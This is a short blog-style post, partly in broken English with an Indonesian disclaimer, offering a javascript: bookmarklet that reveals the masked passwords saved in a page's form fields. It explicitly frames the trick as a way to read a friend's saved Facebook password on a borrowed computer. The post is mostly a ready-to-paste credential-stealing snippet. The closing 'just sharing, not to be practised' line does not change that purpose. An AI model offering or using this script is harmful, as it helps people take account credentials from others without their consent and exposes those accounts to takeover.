Maybe you never use or borrow your friend's computer, then you want to open facebook open to chat for a moment, then you see the user names and passwords are still there, and you want to know the contents of the password but the password is still shaped asteriks code to view hidden passwords use the following script.
javascript:(function(){var s,F,j,f,i; s = %22%22; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == %22password%22) s += f[i].value + %22\n%22; } } if (s) alert(%22Passwords in forms on this page:\n\n%22 + s); else alert(%22There are no saved passwords in forms on this page.%22);})()
copy and paste into the address bar and if there is a hidden password instantly appears in a new window.
*hanya sharing, tidak untuk dipraktekkan